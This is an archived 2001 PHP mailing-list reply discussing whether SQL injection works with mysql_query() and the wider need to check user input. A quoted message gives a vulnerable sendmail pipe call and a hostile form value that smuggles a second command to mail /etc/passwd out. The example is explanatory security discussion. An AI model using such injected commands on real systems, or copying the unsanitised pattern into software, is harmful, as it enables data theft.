Re: Re: Mommy, is it true that...?
| From: | Michael Sims | Date: | Fri, 21 Dec 2001 02:15:30 +0000 |
| Subject: | Re: Re: Mommy, is it true that...? | ||
| References: | 1 | Groups: | php.general |
| Request: | Send a blank email to php-general+get-78388@lists.php.net to get a copy of this message | ||
At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
I've done something similar in the past just for kicks, and I got the same result you did (i.e. an error). I believe this is because mysql_query() expects ONE query at a time and will break if you send two or more. I could be completely and totally wrong about that, though (someone please correct me if I am)... Maybe this one failed, but it's always a good idea to check user input. Let's say you're emailing a form and you don't use the mail() function, but make a call directly to sendmail... and you're sloppy... so you do this: [...]True. But we were speaking specifically about MySQL. When you start toying with external programs and exec() and so forth then you've opened up a whole other can of worms security-wise...
$fp = fopen("|/usr/bin/sendmail $sendto"); #write stuff to pipe to send email... Now... what if when I filled out the form I set $sendto equal to this: philip@adhesivemedia.com; /usr/bin/mail philip@adhesivemedia.com < /etc/passwdA definite possibility, but it does depend on the hacker in question knowing exactly how your script is written...